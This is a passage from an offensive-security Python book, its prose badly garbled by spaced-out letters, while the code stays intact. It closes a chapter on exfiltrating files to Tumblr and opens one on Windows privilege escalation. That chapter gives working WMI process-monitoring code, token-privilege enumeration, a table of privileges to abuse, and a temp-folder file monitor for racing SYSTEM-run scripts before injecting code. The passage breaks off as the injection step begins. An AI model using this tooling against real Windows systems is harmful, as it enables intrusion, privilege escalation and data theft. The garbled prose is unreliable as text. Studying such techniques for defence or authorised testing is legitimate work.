➌ a nd d ecry p t th em , s lo w ly b uild in g u p o ur o rig in al p la in te xt s tr in g. T he f in al s te p
➍ i s
to d eco m pre ss th e p aylo ad , b ecause w e p re v io usly c o m pre sse d i t o n th e o th er s id e.

Kic k in g t h e T ir e s
There a re a l o t o f m ovin g p arts to th is p ie ce o f c o de, b ut i t i s q uite e asy to u se . S im ply r u n y o ur
ie _ exfil.p y
s c rip t f r o m a W in d ow s h o st a nd w ait f o r i t to i n d ic ate th at i t h as s u ccessfu lly p oste d to
Tum blr. I f y o u l e ft I n te rn et E xp lo re r v is ib le , y o u s h o uld h av e b een a b le to w atc h th e w ho le p ro cess.
Afte r i t’ s c o m ple te , y o u s h o uld b e a b le to b ro w se to y o ur T um blr p age a nd s e e s o m eth in g l ik e
Fig ure 9 -1
.
Fig ure 9 -1 . O ur e n cry p te d f ile n am e
As y o u c an s e e, th ere i s a b ig e ncry p te d b lo b, w hic h i s th e n am e o f o ur f ile . I f y o u s c ro ll d ow n, y o u
will c le arly s e e th at th e ti tl e e nd s w here th e f o nt i s n o l o nger b old . I f y o u c o py a nd p aste th e ti tl e i n to
yo ur
decry p to r.p y
f ile a nd r u n i t, y o u s h o uld s e e s o m eth in g l ik e th is :
#:>
python decryptor.py
C:\Program Files\Debugging Tools for Windows (x86)\dml.doc
#:>
Perfe ct! M y
ie _ exfil.p y
s c rip t p ic ked u p a d ocum ent f r o m th e W in d ow s D eb uggin g T ools d ir e cto ry ,
up lo ad ed th e c o nte nts to T um blr, a nd I c an s u ccessfu lly d ecry p t th e f ile n am e. N ow o f c o urs e to d o th e
enti r e c o nte nts o f th e f ile , y o u w ould w ant to a uto m ate i t u sin g th e tr ic ks I s h o w ed y o u i n
Chap te r 5
(u sin g
urllib2
a nd
HTMLParser
), w hic h I w ill l e av e a s a h o m ew ork a ssig nm ent f o r y o u. T he o th er

th in g to c o nsid er i s th at i n o ur
ie _ exfil.p y
s c rip t, w e p ad th e l a st 2 56 b yte s w ith th e s p ace c hara cte r,
and th is m ig ht b re ak c erta in f ile f o rm ats . A no th er i d ea f o r e xte nd in g th e p ro je ct i s to e ncry p t a l e ngth
fie ld a t th e b egin nin g o f th e b lo g p ost c o nte nts th at te lls y o u th e o rig in al s iz e o f th e d ocum ent b efo re
yo u p ad ded i t. Y ou c an th en r e ad i n th is l e ngth a fte r d ecry p ti n g th e b lo g p ost c o nte nts a nd tr im th e f ile
to th at e xact s iz e .
[ 20
]
The P yth on p ackage P yC ry pto c an b e in sta lle d f ro m
http ://w ww.v o id sp ace.o rg .u k/p yth on/m odule s.s h tm l# p ycry p to /
.

Chap te r 1 0. W in d ow s P riv ile g e E sc a la tio n
So y o u’v e p opped a b ox i n sid e a n ic e j u ic y W in d ow s n etw ork . M ayb e y o u l e v era ged a r e m ote h eap
overflo w , o r y o u p his h ed y o ur w ay i n to th e n etw ork . I t’ s ti m e to s ta rt l o okin g f o r w ays to e sc ala te
priv ile ges. I f y o u’re a lr e ad y S Y ST EM o r A dm in is tr a to r, y o u p ro bab ly w ant s e v era l w ays o f
achie v in g th o se p riv ile ges i n c ase a p atc h c ycle k ills y o ur a ccess. I t c an a ls o b e i m porta nt to h av e a
cata lo g o f p riv ile ge e sc ala ti o ns i n y o ur b ack p ocket, a s s o m e e nte rp ris e s r u n s o ftw are th at m ay b e
diffic ult to a naly ze i n y o ur o w n e nv ir o nm ent, a nd y o u m ay n o t r u n i n to th at s o ftw are u nti l y o u’re i n a n
ente rp ris e o f th e s a m e s iz e o r c o m positi o n. I n a ty p ic al p riv ile ge e sc ala ti o n, y o u’re g o in g to e xp lo it a
poorly c o ded d riv er o r n ati v e W in d ow s k ern el i s su e, b ut i f y o u u se a l o w -q uality e xp lo it o r th ere ’s a
pro ble m d urin g e xp lo ita ti o n, y o u r u n th e r is k o f s y ste m i n sta b ility . W e’re g o in g to e xp lo re s o m e o th er
means o f a cq uir in g e le v ate d p riv ile ges o n W in d ow s.
Syste m a d m in is tr a to rs i n l a rg e e nte rp ris e s c o m monly h av e s c hed ule d ta sk s o r s e rv ic es th at w ill
execute c hild p ro cesse s o r r u n V BScrip t o r P ow erS hell s c rip ts to a uto m ate ta sk s. V end ors , to o, o fte n
hav e a uto m ate d , b uilt- in ta sk s th at b ehav e th e s a m e w ay. W e’re g o in g to tr y to ta ke a d vanta ge o f h ig h-
priv ile ge p ro cesse s h and lin g f ile s o r e xecuti n g b in arie s th at a re w rita b le b y l o w -p riv ile ge u se rs .
There a re c o untl e ss w ays f o r y o u to tr y to e sc ala te p riv ile ges o n W in d ow s, a nd w e a re o nly g o in g to
co ver a f e w . H ow ev er, w hen y o u u nd ers ta nd th ese c o re c o ncep ts , y o u c an e xp and y o ur s c rip ts to
begin e xp lo rin g o th er d ark , m usty c o rn ers o f y o ur W in d ow s ta rg ets .
We’ll s ta rt b y l e arn in g h o w to a p ply W in d ow s W MI p ro gra m min g to c re ate a f le xib le i n te rfa ce th at
monito rs th e c re ati o n o f n ew p ro cesse s. W e h arv est u se fu l d ata s u ch a s th e f ile p ath s, th e u se r th at
cre ate d th e p ro cess, a nd e nab le d p riv ile ges. O ur p ro cess m onito rin g th en h and s o ff a ll f ile p ath s to a
file -m onito rin g s c rip t th at c o nti n uo usly k eep s tr a ck o f a ny n ew f ile s c re ate d a nd w hat i s w ritte n to
th em . T his te lls u s w hic h f ile s a re b ein g a ccesse d b y h ig h-p riv ile ge p ro cesse s a nd th e f ile ’s l o cati o n.
The f in al s te p i s to i n te rc ep t th e f ile -c re ati o n p ro cess s o th at w e c an i n je ct s c rip ti n g c o de a nd h av e
th e h ig h-p riv ile ge p ro cess e xecute a c o m mand s h ell. T he b eauty o f th is w ho le p ro cess i s th at i t
doesn ’t i n v olv e a ny A PI h o okin g, s o w e c an f ly u nd er m ost a nti v ir u s s o ftw are ’s r a d ar.

In sta llin g t h e P re re q uis it e s
We n eed to i n sta ll a f e w l ib ra rie s i n o rd er to w rite th e to olin g i n th is c hap te r. I f y o u f o llo w ed th e
in iti a l i n str u cti o ns a t th e b egin nin g o f th e b ook, y o u’ll h av e
easy_install
r e ad y to r o ck. I f n o t, r e fe r
to
Chap te r 1
f o r i n str u cti o ns o n i n sta llin g
easy_install
.
Execute th e f o llo w in g i n a
cm d.e xe
s h ell o n y o ur W in d ow s V M :
C:\> easy_install pywin32 wmi
If f o r s o m e r e aso n th is i n sta lla ti o n m eth o d d oes n o t w ork f o r y o u, d ow nlo ad th e P yW in 3 2 i n sta lle r
dir e ctl y f r o m
http ://s o urc efo rg e.n et/p ro je cts /p yw in 32/
.
Next, y o u’ll w ant to i n sta ll th e e xam ple s e rv ic e th at m y te ch r e v ie w ers D an F ris c h a nd C liff J a nze n
wro te f o r m e. T his s e rv ic e e m ula te s a c o m mon s e t o f v uln era b iliti e s th at w e’v e u nco vere d i n l a rg e
ente rp ris e n etw ork s a nd h elp s to i llu str a te th e e xam ple c o de i n th is c hap te r.
1 .
Dow nlo ad th e z ip f ile f r o m :
http ://w ww.n osta rc h .c o m /b la ckh atp yth on/b hpse rv ic e.z ip
.
2 .
In sta ll th e s e rv ic e u sin g th e p ro vid ed b atc h s c rip t,
in sta ll_ se rv ic e.b at
. M ake s u re y o u a re
ru nnin g a s A dm in is tr a to r w hen d oin g s o .
You s h o uld b e g o od to g o , s o n o w l e t’ s g et o n w ith th e f u n p art!

Cre a tin g a P ro cess M on it o r
I p arti c ip ate d i n a p ro je ct f o r I m munity c alle d E l J e fe , w hic h i s a t i ts c o re a v ery s im ple p ro cess-
monito rin g s y ste m w ith c entr a liz e d l o ggin g(
http ://e lje fe .i m munity in c.c o m /
). T he to ol i s d esig ned to
be u se d b y p eo ple o n th e d efe nse s id e o f s e curity to tr a ck p ro cess c re ati o n a nd th e i n sta lla ti o n o f
malw are . W hile c o nsu lti n g o ne d ay, m y c o w ork er M ark W uerg le r s u ggeste d th at w e u se E l J e fe a s a
lig htw eig ht m echanis m to m onito r p ro cesse s e xecute d a s S Y ST EM o n o ur ta rg et W in d ow s m achin es.
This w ould g iv e u s i n sig ht i n to p ote nti a lly i n se cure f ile h and lin g o r c hild p ro cess c re ati o n. I t w ork ed ,
and w e w alk ed a w ay w ith n um ero us p riv ile ge e sc ala ti o n b ugs th at g av e u s th e k eys to th e k in gd om .
The m ajo r d ra w back o f th e o rig in al E l J e fe i s th at i t u se d a D LL th at w as i n je cte d i n to e v ery p ro cess
to i n te rc ep t c alls to a ll f o rm s o f th e n ati v e
CreateProcess
f u ncti o n. I t th en u se d a n am ed p ip e to
co m munic ate to th e c o lle cti o n c lie nt, w hic h th en f o rw ard ed th e d eta ils o f th e p ro cess c re ati o n to th e
lo ggin g s e rv er. T he p ro ble m w ith th is i s th at m ost a nti v ir u s s o ftw are a ls o h o oks th e
CreateProcess
calls , s o e ith er th ey v ie w y o u a s m alw are o r y o u h av e s y ste m i n sta b ility i s su es w hen E l J e fe r u ns
sid e-b y-s id e w ith a nti v ir u s s o ftw are . W e’ll r e -c re ate s o m e o f E l J e fe ’s m onito rin g c ap ab iliti e s i n a
ho okle ss m anner, w hic h a ls o w ill b e g eare d to w ard o ffe nsiv e te chniq ues r a th er th an m onito rin g. T his
sh o uld m ake o ur m onito rin g p orta b le a nd g iv e u s th e a b ility to r u n w ith a nti v ir u s s o ftw are a cti v ate d
with o ut i s su e.

Pro cess M on it o rin g w it h W MI
The W MI A PI g iv es th e p ro gra m mer th e a b ility to m onito r th e s y ste m f o r c erta in e v ents , a nd th en
re ceiv e c allb acks w hen th o se e v ents o ccur. W e’re g o in g to l e v era ge th is i n te rfa ce to r e ceiv e a
callb ack e v ery ti m e a p ro cess i s c re ate d . W hen a p ro cess g ets c re ate d , w e’re g o in g to tr a p s o m e
valu ab le i n fo rm ati o n f o r o ur p urp ose s: th e ti m e th e p ro cess w as c re ate d , th e u se r th at s p aw ned th e
pro cess, th e e xecuta b le th at w as l a unched a nd i ts c o m mand -lin e a rg um ents , th e p ro cess I D , a nd th e
pare nt p ro cess I D . T his w ill s h o w u s a ny p ro cesse s th at a re c re ate d b y h ig her-p riv ile ge a cco unts , a nd
in p arti c ula r, a ny p ro cesse s th at a re c allin g e xte rn al f ile s s u ch a s V BScrip t o r b atc h s c rip ts . W hen w e
hav e a ll o f th is i n fo rm ati o n, w e’ll a ls o d ete rm in e w hat p riv ile ges a re e nab le d o n th e p ro cess to kens.
In c erta in r a re c ase s, y o u’ll f in d p ro cesse s th at a re c re ate d a s a r e gula r u se r b ut w hic h h av e b een
gra nte d a d diti o nal W in d ow s p riv ile ges th at y o u c an l e v era ge.
Let’ s b egin b y c re ati n g a v ery s im ple m onito rin g s c rip t
[ 21
]
th at p ro vid es th e b asic p ro cess
in fo rm ati o n, a nd th en b uild o n th at to d ete rm in e th e e nab le d p riv ile ges. N ote th at i n o rd er to c ap tu re
in fo rm ati o n a b out
hig h-p riv ile ge p ro cesse s c re ate d b y S Y ST EM , f o r e xam ple , y o u’ll n eed to r u n y o ur
monito rin g s c rip t a s a n A dm in is tr a to r. L et’ s g et s ta rte d b y a d din g th e f o llo w in g c o de to
pro cess_ m onito r.p y
:
import win32con
import win32api
import win32security
import wmi
import sys
import os
def log_to_file(message):
fd = open("process_monitor_log.csv", "ab")
fd.write("%s\r\n" % message)
fd.close()
return
# create a log file header
log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")
# instantiate the WMI interface
➊ c = wmi.WMI()
# create our process monitor
➋ process_watcher = c.Win32_Process.watch_for("creation")
while True:
try:
➌ new_process = process_watcher()
➍ proc_owner = new_process.GetOwner()
proc_owner = "%s\\%s" % (proc_owner[0],proc_owner[2])
create_date = new_process.CreationDate
executable = new_process.ExecutablePath
cmdline = new_process.CommandLine
pid = new_process.ProcessId
parent_pid = new_process.ParentProcessId
privileges = "N/A"
process_log_message = "%s,%s,%s,%s,%s,%s,%s\r\n" % (create_date,

proc_owner, executable, cmdline, pid, parent_pid, privileges)
print process_log_message
log_to_file(process_log_message)
except:
pass
We s ta rt b y i n sta nti a ti n g th e W MI c la ss
➊ a nd th en te llin g i t to w atc h f o r th e p ro cess c re ati o n e v ent
➋ . B y r e ad in g th e P yth o n W MI d ocum enta ti o n, w e l e arn th at y o u c an m onito r p ro cess c re ati o n o r
dele ti o n e v ents . I f y o u d ecid e th at y o u’d l ik e to c lo se ly m onito r p ro cess e v ents , y o u c an u se th e
opera ti o n a nd i t w ill n o ti fy y o u o f e v ery s in gle e v ent a p ro cess g o es th ro ugh. W e th en e nte r a l o op,
and th e l o op b lo cks u nti l
process_watcher
r e tu rn s a n ew p ro cess e v ent
➌ . T he n ew p ro cess e v ent
is a W MI c la ss c alle d
Win32_Process
[ 22
]
th at c o nta in s a ll o f th e r e le v ant i n fo rm ati o n th at w e a re
afte r. O ne o f th e c la ss f u ncti o ns i s
GetOwner
, w hic h w e c all
➍ to d ete rm in e w ho s p aw ned th e
pro cess a nd f r o m th ere w e c o lle ct a ll o f th e p ro cess i n fo rm ati o n w e a re l o okin g f o r, o utp ut i t to th e
sc re en, a nd l o g i t to a f ile .

Kic k in g t h e T ir e s
Let’ s f ir e u p o ur p ro cess m onito rin g s c rip t a nd th en c re ate s o m e p ro cesse s to s e e w hat th e o utp ut
lo oks l ik e.
C:\>
python process_monitor.py
20130907115227.048683-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\
notepad.exe,"C:\WINDOWS\system32\notepad.exe" ,740,508,N/A
20130907115237.095300-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\
calc.exe,"C:\WINDOWS\system32\calc.exe" ,2920,508,N/A
Afte r r u nnin g th e s c rip t, I r a n
note p ad.e xe
a nd
ca lc .e xe
. Y ou c an s e e th e i n fo rm ati o n b ein g o utp ut
co rre ctl y , a nd n o ti c e th at b oth p ro cesse s h ad th e P are nt P ID s e t to 5 08, w hic h i s th e p ro cess I D o f
exp lo re r.e xe
i n m y V M . Y ou c o uld n o w ta ke a n e xte nd ed b re ak a nd l e t th is s c rip t r u n f o r a d ay a nd
se e a ll o f th e p ro cesse s, s c hed ule d ta sk s, a nd v ario us s o ftw are u p date rs r u nnin g. Y ou m ig ht a ls o s p ot
malw are i f y o u’re ( u n)lu cky. I t’ s a ls o u se fu l to l o g o ut a nd l o g b ack i n to y o ur ta rg et, a s e v ents
genera te d f r o m th ese a cti o ns c o uld i n d ic ate p riv ile ged p ro cesse s. N ow th at w e h av e b asic p ro cess
monito rin g i n p la ce, l e t’ s f ill o ut th e p riv ile ges f ie ld i n o ur l o ggin g a nd l e arn a l ittl e b it a b out h o w
Win d ow s p riv ile ges w ork a nd w hy th ey’re i m porta nt.

Win dow s T ok en P riv ile g es
A W in d ow s to ken i s , p er M ic ro so ft: “ an o bje ct th at d esc rib es th e s e curity c o nte xt o f a p ro cess o r
th re ad .”
[ 23
]
H ow a to ken i s i n iti a liz e d a nd w hic h p erm is sio ns a nd p riv ile ges a re s e t o n a to ken
dete rm in e w hic h ta sk s th at p ro cess o r th re ad c an p erfo rm . A w ell- in te nti o ned d ev elo per m ig ht h av e a
sy ste m tr a y a p plic ati o n a s p art o f a s e curity p ro duct, w hic h th ey’d l ik e to g iv e th e a b ility f o r a n o n-
priv ile ged u se r to c o ntr o l th e m ain W in d ow s s e rv ic e, w hic h i s a d riv er. T he d ev elo per u se s th e
nati v e W in d ow s A PI f u ncti o n
AdjustTokenPrivileges
o n th e p ro cess a nd i n no centl y e no ugh g ra nts
th e s y ste m tr a y a p plic ati o n th e
SeLoadDriver
p riv ile ge. W hat th e d ev elo per i s n o t th in kin g a b out i s
th e f a ct th at i f y o u c an c lim b i n sid e th at s y ste m tr a y a p plic ati o n, y o u to o n o w h av e th e a b ility to l o ad
or u nlo ad a ny d riv er y o u w ant, w hic h m eans y o u c an d ro p a k ern el m ode r o otk it — a nd th at m eans
gam e o ver.
Bear i n m in d , i f y o u c an’t r u n y o ur p ro cess m onito r a s S Y ST EM o r a n a d m in is tr a ti v e u se r, th en y o u
need to k eep a n e ye o n w hat p ro cesse s y o u
are
a b le to m onito r, a nd s e e i f th ere a re a ny a d diti o nal
priv ile ges y o u c an l e v era ge. A p ro cess r u nnin g a s y o ur u se r w ith th e w ro ng p riv ile ges i s a f a nta sti c
way to g et to S Y ST EM o r r u n c o de i n th e k ern el. I n te re sti n g p riv ile ges th at I a lw ays l o ok o ut f o r a re
lis te d i n
Tab le 1 0-1
. I t i s n ’t e xhausti v e, b ut s e rv es a s a g o od s ta rti n g p oin t.
[ 24
]
Ta ble 1 0-1 . I n te re stin g P riv ile g es
Priv ile ge n am e
Acce ss t h at is g ra n te d
SeBackupPrivilege
This e nable s th e u se r p ro cess to b ack u p f ile s a nd d ir e cto rie s, a nd g ra nts R EA D a ccess to f ile s n o m atte r w hat
th eir A CL d efin es.
SeDebugPrivilege
This e nable s th e u se r p ro cess to d ebug o th er p ro cesse s. T his a ls o in clu des o bta in in g p ro cess h andle s to in je ct
DLLs o r c ode in to r u nnin g p ro cesse s.
SeLoadDriver
This e nable s a u se r p ro cess to lo ad o r u nlo ad d riv ers .
Now th at w e h av e th e f u nd am enta ls o f w hat p riv ile ges a re a nd w hic h p riv ile ges to l o ok f o r, l e t’ s
le v era ge P yth o n to a uto m ati c ally r e tr ie v e th e e nab le d p riv ile ges o n th e p ro cesse s w e’re m onito rin g.
We’ll m ake u se o f th e
win32security
,
win32api
, a nd
win32con
m odule s. I f y o u e nco unte r a
situ ati o n w here y o u c an’t l o ad th ese m odule s, a ll o f th e f o llo w in g f u ncti o ns c an b e tr a nsla te d i n to
nati v e c alls u sin g th e c ty p es l ib ra ry ; i t’ s j u st a l o t m ore w ork . A dd th e f o llo w in g c o de to
pro cess_ m onito r.p y
d ir e ctl y a b ove o ur e xis ti n g
log_to_file
f u ncti o n:
def get_process_privileges(pid):
try:
# obtain a handle to the target process
➊ hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_
INFORMATION,False,pid)
# open the main process token
➋ htok = win32security.OpenProcessToken(hproc,win32con.TOKEN_QUERY)
# retrieve the list of privileges enabled
➌ privs = win32security.GetTokenInformation(htok, win32security.
TokenPrivileges)
# iterate over privileges and output the ones that are enabled
priv_list = ""
for i in privs:
# check if the privilege is enabled

➍ if i[1] == 3:
➎ priv_list += "%s|" % win32security.
LookupPrivilegeName(None,i[0])
except:
priv_list = "N/A"
return priv_list
We u se th e p ro cess I D to o bta in a h and le to th e ta rg et p ro cess
➊ . N ext, w e c ra ck o pen th e p ro cess
to ken
➋ a nd th en r e q uest th e to ken i n fo rm ati o n f o r th at p ro cess
➌ . B y s e nd in g th e
win32security.TokenPrivileges
s tr u ctu re , w e a re i n str u cti n g th e A PI c all to h and b ack a ll o f th e
priv ile ge i n fo rm ati o n f o r th at p ro cess. T he f u ncti o n c all r e tu rn s a l is t o f tu p le s, w here th e f ir s t
mem ber o f th e tu p le i s th e p riv ile ge a nd th e s e co nd m em ber d esc rib es w heth er th e p riv ile ge i s
enab le d o r n o t. B ecause w e a re o nly c o ncern ed w ith th e p riv ile ges th at a re e nab le d , w e f ir s t c heck
fo r th e e nab le d b its
➍ a nd th en w e l o ok u p th e h um an-re ad ab le n am e f o r th at p riv ile ge
➎ .
Next w e’ll m odify o ur e xis ti n g c o de s o th at w e’re p ro perly o utp utti n g a nd l o ggin g th is i n fo rm ati o n.
Change th e f o llo w in g l in e o f c o de f r o m th is :
privileges = "N/A"
to th e f o llo w in g:
privileges = get_process_privileges(pid)
Now th at w e h av e a d ded o ur p riv ile ge tr a ckin g c o de, l e t’ s r e ru n th e
pro cess_ m onito r.p y
s c rip t a nd
check th e o utp ut. Y ou s h o uld s e e p riv ile ge i n fo rm ati o n a s s h o w n i n th e o utp ut b elo w :
C:\>
python.exe process_monitor.py
20130907233506.055054-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\
notepad.exe,"C:\WINDOWS\system32\notepad.exe" ,660,508,SeChangeNotifyPrivilege
|SeImpersonatePrivilege|SeCreateGlobalPrivilege|
20130907233515.914176-300,JUSTIN-V2TRL6LD\Administrator,C:\WINDOWS\system32\
calc.exe,"C:\WINDOWS\system32\calc.exe" ,1004,508,SeChangeNotifyPrivilege|
SeImpersonatePrivilege|SeCreateGlobalPrivilege|
You c an s e e th at w e a re c o rre ctl y l o ggin g th e e nab le d p riv ile ges f o r th ese p ro cesse s. W e c o uld e asily
put s o m e i n te llig ence i n to th e s c rip t to l o g o nly p ro cesse s th at r u n a s a n u np riv ile ged u se r b ut h av e
in te re sti n g p riv ile ges e nab le d . W e w ill s e e h o w th is u se o f p ro cess m onito rin g w ill l e t u s f in d
pro cesse s th at a re u ti liz in g e xte rn al f ile s i n se cure ly .

Win nin g t h e R ace
Batc h s c rip ts , V BScrip t, a nd P ow erS hell s c rip ts m ake s y ste m a d m in is tr a to rs ’ l iv es e asie r b y
auto m ati n g h um dru m ta sk s. T heir p urp ose c an v ary f r o m c o nti n ually r e gis te rin g to a c entr a l i n v ento ry
se rv ic e to f o rc in g u p date s o f s o ftw are f r o m th eir o w n r e p osito rie s. O ne c o m mon p ro ble m i s th e l a ck
of p ro per A CLs o n th ese s c rip ti n g f ile s. I n a n um ber o f c ase s, o n o th erw is e s e cure s e rv ers , I ’ v e f o und
batc h s c rip ts o r P ow erS hell s c rip ts th at a re r u n o nce a d ay b y th e S Y ST EM u se r w hile b ein g g lo bally
writa b le b y a ny u se r.
If y o u r u n y o ur p ro cess m onito r l o ng e no ugh i n a n e nte rp ris e ( o r y o u s im ply i n sta ll th e e xam ple
se rv ic e p ro vid ed i n th e b egin nin g o f th is c hap te r), y o u m ig ht s e e p ro cess r e co rd s th at l o ok l ik e th is :
20130907233515.914176-300,NT AUTHORITY\SYSTEM,C:\WINDOWS\system32\cscript.
exe, C:\WINDOWS\system32\cscript.exe /nologo "
C:\WINDOWS\Temp\azndldsddfggg.
vbs"
,1004,4,SeChangeNotifyPrivilege|SeImpersonatePrivilege|SeCreateGlobal
Privilege|
You c an s e e th at a S Y ST EM p ro cess h as s p aw ned th e
csc rip t.e xe
b in ary a nd p asse d i n th e
C:\W IN D OW S\T em p\a ndld sd dfg gg.v b s
p ara m ete r. T he e xam ple s e rv ic e p ro vid ed s h o uld g enera te
th ese e v ents o nce p er m in ute . I f y o u d o a d ir e cto ry l is ti n g, y o u w ill n o t s e e th is f ile p re se nt. W hat i s
hap penin g i s th at th e s e rv ic e i s c re ati n g a r a nd om f ile nam e, p ush in g V BScrip t i n to th e f ile , a nd th en
executi n g th at V BScrip t. I ’ v e s e en th is a cti o n p erfo rm ed b y c o m merc ia l s o ftw are i n a n um ber o f
case s, a nd I ’ v e s e en s o ftw are th at c o pie s f ile s i n to a te m pora ry l o cati o n, e xecute , a nd th en d ele te
th o se f ile s.
In o rd er to e xp lo it th is c o nd iti o n, w e h av e to e ffe cti v ely w in a r a ce a gain st th e e xecuti n g c o de. W hen
th e s o ftw are o r s c hed ule d ta sk c re ate s th e f ile , w e n eed to b e a b le to i n je ct o ur o w n c o de i n to th e f ile
befo re th e p ro cess e xecute s i t a nd th en u lti m ate ly d ele te s i t. T he tr ic k to th is i s th e h and y W in d ow s
API c alle d
ReadDirectoryChangesW
, w hic h e nab le s u s to m onito r a d ir e cto ry f o r a ny c hanges to
file s o r s u b dir e cto rie s. W e c an a ls o f ilte r th ese e v ents s o th at w e’re a b le to d ete rm in e w hen th e f ile
has b een “ sa v ed ” s o w e c an q uic kly i n je ct o ur c o de b efo re i t’ s e xecute d . I t c an b e i n cre d ib ly u se fu l to
sim ply k eep a n e ye o n a ll te m pora ry d ir e cto rie s f o r a p erio d o f 2 4 h o urs o r l o nger, b ecause
so m eti m es y o u’ll f in d i n te re sti n g b ugs o r i n fo rm ati o n d is c lo su re s o n to p o f p ote nti a l p riv ile ge
esc ala ti o ns.
Let’ s b egin b y c re ati n g a f ile m onito r, a nd th en w e’ll b uild o n th at to a uto m ati c ally i n je ct c o de. C re ate
a n ew f ile c alle d
file _ m onito r.p y
a nd h am mer o ut th e f o llo w in g:
# Modified example that is originally given here:
# http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.
html
import tempfile
import threading
import win32file
import win32con
import os
# these are the common temp file directories
➊ dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
# file modification constants
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
def start_monitor(path_to_watch):

# we create a thread for each monitoring run
FILE_LIST_DIRECTORY = 0x0001
➋ h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_
SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None)
while 1:
try:
➌ results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
➍ for action,file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print "[ + ] Created %s" % full_filename
elif action == FILE_DELETED:
print "[ - ] Deleted %s" % full_filename
elif action == FILE_MODIFIED:
print "[ * ] Modified %s" % full_filename
# dump out the file contents
print "[vvv] Dumping contents..."
➎ try:
fd = open(full_filename,"rb")
contents = fd.read()
fd.close()
print contents
print "[^^^] Dump complete."
except:
print "[!!!] Failed."
elif action == FILE_RENAMED_FROM:
print "[ > ] Renamed from: %s" % full_filename
elif action == FILE_RENAMED_TO:
print "[ < ] Renamed to: %s" % full_filename
else:
print "[???] Unknown: %s" % full_filename
except:
pass
for path in dirs_to_monitor:
monitor_thread = threading.Thread(target=start_monitor,args=(path,))
print "Spawning monitoring thread for path: %s" % path
monitor_thread.start()
We d efin e a l is t o f d ir e cto rie s th at w e’d l ik e to m onito r
➊ , w hic h i n o ur c ase a re th e tw o c o m mon
te m pora ry f ile s d ir e cto rie s. K eep i n m in d th at th ere c o uld b e o th er p la ces y o u w ant to k eep a n e ye o n,
so e d it th is l is t a s y o u s e e f it. F or e ach o f th ese p ath s, w e’ll c re ate a m onito rin g th re ad th at c alls th e

start_monitor
f u ncti o n. T he f ir s t ta sk o f th is f u ncti o n i s to a cq uir e a h and le to th e d ir e cto ry w e
wis h to m onito r
➋ . W e th en c all th e
ReadDirectoryChangesW
f u ncti o n
➌ , w hic h n o ti fie s u s w hen a
change o ccurs . W e r e ceiv e th e f ile nam e o f th e ta rg et f ile th at c hanged a nd th e ty p e o f e v ent th at
hap pened
➍ . F ro m h ere w e p rin t o ut u se fu l i n fo rm ati o n a b out w hat h ap pened w ith th at p arti c ula r f ile ,
and i f w e d ete ct th at i t’ s b een m odifie d , w e d um p o ut th e c o nte nts o f th e f ile f o r r e fe re nce
➎ .

Kic k in g t h e T ir e s
Open a
cm d.e xe
s h ell a nd r u n
file _ m onito r.p y
:
C:\>
python.exe file_monitor.py
Open a s e co nd
cm d.e xe
s h ell a nd e xecute th e f o llo w in g c o m mand s:
C:\>
cd %temp%
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>
echo hello > filetest
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>
rename filetest file2test
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>
del file2test
You s h o uld s e e o utp ut th at l o oks l ik e th e f o llo w in g:
Spawning monitoring thread for path: C:\WINDOWS\Temp
Spawning monitoring thread for path: c:\docume~1\admini~1\locals~1\temp
[ + ] Created c:\docume~1\admini~1\locals~1\temp\filetest
[ * ] Modified c:\docume~1\admini~1\locals~1\temp\filetest
[vvv] Dumping contents...
hello
[^^^] Dump complete.
[ > ] Renamed from: c:\docume~1\admini~1\locals~1\temp\filetest
[ < ] Renamed to: c:\docume~1\admini~1\locals~1\temp\file2test
[ * ] Modified c:\docume~1\admini~1\locals~1\temp\file2test
[vvv] Dumping contents...
hello
[^^^] Dump complete.
[ - ] Deleted c:\docume~1\admini~1\locals~1\temp\FILE2T~1
If a ll o f th e a b ove h as w ork ed a s p la nned , I e nco ura ge y o u to k eep y o ur f ile m onito r r u nnin g f o r 2 4
ho urs o n a ta rg et s y ste m . Y ou m ay b e s u rp ris e d ( o r n o t) to s e e f ile s b ein g c re ate d , e xecute d , a nd
dele te d . Y ou c an a ls o u se y o ur p ro cess-m onito rin g s c rip t to tr y to f in d i n te re sti n g f ile p ath s to m onito r
as w ell. S oftw are u p date s c o uld b e o f p arti c ula r i n te re st. L et’ s m ove o n a nd a d d th e a b ility to
auto m ati c ally i n je ct c o de i n to a ta rg et f ile .

Cod e I n je ctio n
Now th at w e c an m onito r p ro cesse s a nd f ile l o cati o ns, l e t’ s ta ke a l o ok a t b ein g a b le to a uto m ati c ally
in je ct c o de i n to ta rg et f ile s. T he m ost c o m mon s c rip ti n g l a nguages I ’ v e s e en e m plo yed a re V BScrip t,
batc h f ile s, a nd P ow erS hell. W e’ll c re ate v ery s im ple c o de s n ip pets th at s p aw n a c o m pile d v ers io n o f
our
bhpnet.p y
to ol w ith th e p riv ile ge l e v el o f th e o rig in ati n g s e rv ic e. T here a re a v ast a rra y o f n asty
th in gs y o u c an d o w ith th ese s c rip ti n g l a nguages;
[ 25
]
w e’ll c re ate th e g enera l f r a m ew ork to d o s o , a nd
yo u c an r u n w ild f r o m th ere . L et’ s m odify o ur
file _ m onito r.p y
